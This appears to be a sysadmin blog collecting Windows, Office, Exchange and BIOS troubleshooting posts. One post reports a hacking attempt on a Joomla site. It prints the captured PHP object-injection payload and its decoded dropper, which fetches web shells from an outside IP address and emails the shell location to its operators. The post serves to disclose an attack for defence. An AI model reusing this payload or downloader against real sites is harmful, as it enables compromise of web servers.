• -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT"
• -in explorer travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
• -right-click > properties > security > edit > add
• -type: NETWORK SERVICE
• -give NETWORK SERVICE full-control
• -reboot

Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions:

• -right-click on S-1-5-20
• -type: network service
• -click OK
• -checkmark FULL CONTROL
• -click OK

I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!!

Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install because it was on your computer when you bought it and you just used a PRODUCT KEY.

What do you do?

NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others).

1 - UNINSTALL OFFICE

You can uninstall office by using the automatic uninstall tool here:

2013 | 2016
http://support.microsoft.com/kb/2739501

3 - EXTRACT OFFICE

• -run COMMAND PROMPT (as administrator)
• -office_hs_2010_english_x32.exe /extract:c:\office2010

4 - INSTALL OFFICE

• -right-click on setup.exe

[Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop

"Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop!

or

"Your PC did not start correctly"

Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!"

This is the stuff that I really dread for the average person. How in the world is a normal person supposed to be able to get through an issue like this?

There are 10 possible reasons for this loop and possibly more that need repairing:

• 1-startup repair
• 2-checkdisk
• 3-system restore
• 4-safe boot / low res
• 5-sfc
• 6-windowsapps folder
• 7-registry repair
• 8-boot repair
• 9-dism

ISSUE 1 - There is a startup problem (startup repair).

• -click TROUBLESHOOT.
• -click STARTUP REPAIR.
• -let it go through its process and restart.

ISSUE 2 - There is a filesystem problem (checkdisk).

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: chkdsk d: /f /r
• (note depending on what your OS drive letter is, this could be: chkdsk c: /f /r)
• -let it go through its process and restart.

ISSUE 3 - System Restore

• -click TROUBLESHOOT.
• -click SYSTEM RESTORE.
• this will go through a process of showing previous time in the past. You can choose one of these points. Your system-files will go back to that time, removing any updates, patches or changes. Your document-files will remain as they are now.
• -let it go through its process and restart.

ISSUE 4 - safe-mode or low-resolution-video

• -click TROUBLESHOOT.
• -click STARTUP-SETTINGS
• -the computer will reboot and give the options to press F1 through F9
• -press F3 to try low-resolution video as sometimes Windows 10 suddenly doesn't like the video drivers.
• -or press F5 to try to get to safe-mode-with-networking.

ISSUE 5 - sfc

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: sfc /scannow
• -let it go through its process and restart.

ISSUE 6 - windowsapps folder

For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"):

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y
• -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t
• -type: rd /s "C:\Program Files\WindowsApps"
• -reboot and see if that works.

ISSUE 7 - There is a registry error.

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: d:
• -hit enter
• -type: cd windows
• -hit enter
• -type: cd system32
• -hit enter
• -type: cd config
• -hit enter
• -type: ren default default1
• -hit enter
• -type: ren sam sam1
• -hit enter
• -type: ren software software1
• -hit enter
• -type: ren security security1
• -hit enter
• -type: ren system system1
• -hit enter
• -type: cd regback
• -hit enter
• -type: copy * ..\
• (that is: copy-space-asterisk-space-dot-dot-backslash)
• -hit enter
• -type: exit
• -let it reboot and see if that works.

ISSUE 8 - There is a boot problem.

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type:bootrec.exe /fixmbr
• -type: bootrec.exe /fixboot
• -type: bootrec.exe /RebuildBcd
• -type: exit
• -let it reboot and see if that works.

ISSUE 9 - dism

This is the only issue that I have not tried personally as I've never had to get this far. The idea is that there is something wrong with Windows and that it can be repaired:

• -click TROUBLESHOOT.
• -click COMMAND PROMPT
• -type: dism /online /cleanup-image /scanhealth
• -type: dism /online /cleanup-image /restorehealth
• -let it go through its process and restart.

ISSUE 10 - reload and transfer

If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal but usually by this point, reloading and transferring data is going to be faster than further troubleshooting.

Those are the 10 issues that I go through when I get, "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop.

1-3-2 Bios Beeps Dell Precision T3500

Dell Precision T3500 boots fine.

Upon, reboot the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen.

The only way to get it to reboot properly without the bios beeps is to yank the power from the computer. Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button.

But here's how to fix:

• -reset to defaults.
• -turn off the FAST BOOT.
• -disable the DISKETTE DRIVE.
• -uncheck the ONBOARD OR USB FLOPPY DRIVE.
• -uncheck the ONBOARD OR USB CD DRIVE.

While we are at it, change the silly default options:

• -disable LOW-POWER-MODE.
• -enable HYPER-THREADING (if you have it).
• -enable MULTICORE.
• -enable TURBOBOOST.
• -disable SPEEDSTEP.
• -enable SMART TEST.

There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE.

NOTES:

• -this was a 6 month process :-(
• -replacing the 525W power supply with a 850W power supply didn't work.

WINDOWS 10 Falls Asleep After 2 Minutes

MANUAL EDIT:

01 -click START > RUN > CMD (or POWERSHELL) (as administrator)
02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /d 2
03 -enter
04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /d 2
05 -enter
06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on the "Change advanced power settings".
07 -click on the "Change settings that are currently unavailable"
08 -click Sleep > System unattended sleep timeout > type 0
09 -click USB-SETTINGS > USB-3-LINK-POWER-MANAGEMENT > set to OFF
10 -click OK
11 That's it!!! You did it!!!

OFFICE 2013 ACTIVATION

I'm not an expert on ACTIVATION as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here. Here's how:

• -click START > RUN
• -type: cmd
• -type: cd C:\Program Files\Microsoft Office\Office15

From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE.

GET STATUS

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

CHANGE KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

ACTIVATE KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

The result will look something like this:

RESULT

Microsoft (R) Windows Script Host Version 5.812

---Processing--------------------------
---------------------------------------
SKU ID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
LICENSE NAME: Office 15, OfficeStandardVL_MAK edition
LICENSE DESCRIPTION: Office 15, RETAIL(MAK) channel
Last 5 characters of installed product key: XXXXX
---------------------------------------
---------------------------------------
---Exiting-----------------------------

Sometimes, there is a double install where 2 different versions are installed at the same time. A KMS version and a MAK version. You can find out by

SEE ALL KEYS THAT ARE TRYING TO ACTIVATE

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus

UNINSTALL KEY THAT ISN'T CORRECT

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits

THEN IMMEDIATELY INSTALL AN MAK KEY

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

THEN ACTIVATE

• C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act

Windows 10 ISO

To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1 until the end of JULY 2016.

To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here:

Now you have a bootable USB disk.

But what if you want to create a multiple boot USB disk where WINDOWS 10 is just one of the options? You would somehow have to create a WINDOWS 10 ISO.

I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut.

• -click MAKE_E2B_USB_DRIVE (run as admin)
(CAUTION!!! This will delete everything on the USB drive.)
• -install your ISO/IMG/IMGPTN in the appropriate place.

Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways.

FIRST WAY TO GET WINDOWS 10 ISO

• -open CHROME
• -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS
• -a window open on the right hand side.
• -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right hand side).
• (It is the second one from the left.)
• -you will see 4 options
WINDOWS 10 (all languages)
WINDOWS 10 K (Korean law)
WINDOWS 10 N (European law)
WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES)

For me, doing this somehow downloaded the iso as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.EDB to say WINDOWS 10 PRO. I do not know yet if it matters.

NOTE: If you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.

SECOND WAY TO GET WINDOWS 10 ISO

So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it?

You don't turn it into an ISO. You turn it into a IMG (more specifically an imgPTN file). I won't go into details but you can't turn an entire bootable USB into an ISO easily. There's too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN.

Here's how to turn it into an BOOTABLE IMG.

• http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip
• -unzip it.
• -open the ImDisk\imdiskinst.exe file and run it to install the driver.
• -plug in your BOOTABLE USB drive.
• -the computer will assign a drive letter (for example DRIVE G).
• -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut.
• -it will create an image of the USB drive.
• -wait.
• -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\).
• -click MAKE_THIS_DRIVE_CONTIGUOUS

That's it!!!! You've done it.

Creating Resource Rooms in Exchange 2013

Creating resource rooms in EXCHANGE 2013 can be complicated as the GUI doesn't work in a straight-forward manner.

Here's how I did it:

• New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room
• Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer
• Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept

This will allow users to set an appointment with the ROOM as the LOCATION but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment).

Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52 which was resolving to catchmeapp.com

NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker.

==========================
GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp
lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u
rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7
DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz
l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj
bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn
VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5
OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1
kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS
amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl
xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa
VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz
BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR
tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5
elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl
WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE
bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn
ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt
OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF
JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds
c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT
s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s
:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
===============================================

This translates into:

===============================================
$check =$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvY3NzLnR4dCcpOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly83NC4yMDguNDcuNTIvZ2V0L20udHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3cuaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvdy50eHQnKTsNCiRvcDM9Zm9wZW4oJGNoZWNrMywgJ3cnKTsNCmZ3cml0ZSgkb3AzLCR0ZXh0Myk7DQpmY2xvc2UoJG9wMyk7DQoNCiRjaGVjazQ9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9jaGVjay5waHAiIDsNCiR0ZXh0NCA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9tbS50eHQnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY2xvc2UoJG9wNSk7DQoNCiRjaGVjazY9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qdXNlci5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC91c2VyLnR4dCcpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICJnYWJieS5jYXNoQHlhbmRleC5jb20sb2xvamVzaGFrYXJhQGdtYWlsLmNvbSI7DQokc3ViamVjdCA9ICdKb20genp6ICcgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsNCiRoZWFkZXIgPSAnZnJvbTogS2Vra2FpIFNlbnNlbiA8dm9uUmVpbmhlcnpLbGF1c0BTYWlrb3VuYUhpYmkuY29tPicgLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4=')); fclose($fp);
================================================

Which further is decoded to:

================================================

<?php
function http_get($url){$im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im);
curl_close($im); }$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;$text = http_get('http://74.208.47.52/get/css.txt');
$open = fopen($check, 'w');
fwrite($open,$text);
fclose($open); if(file_exists($check)){
echo $check."</br>"; }else echo "not exits"; echo "done .\n " ;$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;$text2 = http_get('http://74.208.47.52/get/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2,$text2);
fclose($open2); if(file_exists($check2)){
echo $check2."</br>"; }else echo "not exits2"; echo "done2 .\n " ;$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;$text3 = http_get('http://74.208.47.52/get/w.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;$text4 = http_get('http://74.208.47.52/get/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;$text5 = http_get('http://74.208.47.52/get/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;$text6 = http_get('http://74.208.47.52/get/user.txt');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it ";
$subject = 'Jom zzz ' .$_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text83189 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";$sentmail = @mail($toz,$subject, $message,$header);

?>
===============================================

Nice try... but not this time.

Hacking Attempt 16-05

Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com

=============================
==============================

This translates into:

==============================
<script type='text/javascript'> <!-- var prefix = 'ma'   'il'   'to'; var path = 'hr'   'ef'   '='; var addy64466 = 'PetersHyland'   '@'; addy64466 = addy64466   'ipre'   '.'   'com'; document.write('<a '   path   '\''   prefix   ':'   addy64466   '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script>
==============================

This was repeated in a brute force attack, changing the password for every attemtp.

Nice one... but not this time.

Clean Install Windows 10

Clean installing Windows 10 can be a pain. There's too many gotchas that it can be frustrating.

Here's how I did it:

• -after your have created the USB, check to make sure you have the right BUILD NUMBER (see other article post).
• -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS.
(NOTE: this is in contrast to the WINDOWS 8 that requires to NOT select "I don't have a product key" as activation will not be successful. )

Find Windows 10 ISO Version or Build Number

Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8.

• -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD.
• -find where the "install.wim" (or install.esd) is. For example; F:\sources\install.wim
• -open CMD
• -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1
• -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1

This will show the details of the INSTALL.WIM file.

NOTE:

-in some cases, Windows-7 will not be able to read a Windows-10 install.esd file :-(

Re-enable Mailbox in Exchange 2013

If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However if you disable a MAILBOX in EXCHANGE and you disable an AD account, the MAILBOX will not show as a disconnected MAILBOX.

Here's how to get it back on demand.

First, check to see the RETENTION settings of the MAILBOXDATABASE:

$Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here"

You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account needed.

$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:$Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here"  | Get-MailboxStatistics | Where { \$_.Displayname -eq "full-display-name-here)" } | Connect-Mailbox -User "username-here"

Windows 8/8.1/10 Product Keys

SITUATION

You have a new computer and you test out Linux destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive.

RESOLUTION

Find a pc that has a DVD drive.

1-create an ISO with 7ZIP.

• -select the DVD DRIVE.
• -click VIEW (at the top).
• -click OPEN ROOT FOLDER.
• -click VIEW (at the top).
• -click UP ONE LEVEL.
• -in the main window you will see: \\. (backslash, backslash, dot).
• -double-click \\.
• -select the DVD drive.
• -click FILE > COPY-TO (at the top)
• -select the folder where you want the ISO to go.

2-copy that ISO to your EASY2BOOT USB.

• -easy squeezy.

NOTE: if you do not have one, get one. It's super easy. Run tool. Have USB.

3-install WINDOWS.

• -the install should use the PRODUCT KEY from the UEFI (or in laymans terms BIOS).
• -if you are being prompted for a product key, it means that you have the wrong installation media and that's when the Windows 8.1/10 installer can't detect Windows 8/8.1 product key from UEFI firmware (BIOS).
• -it will prompt which version to install, WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO
• -do NOT select "I don't have a product key". Activation will not be successful.

4-find WINDOWS PRODUCT KEY in the UEFI.

• -open the tool.
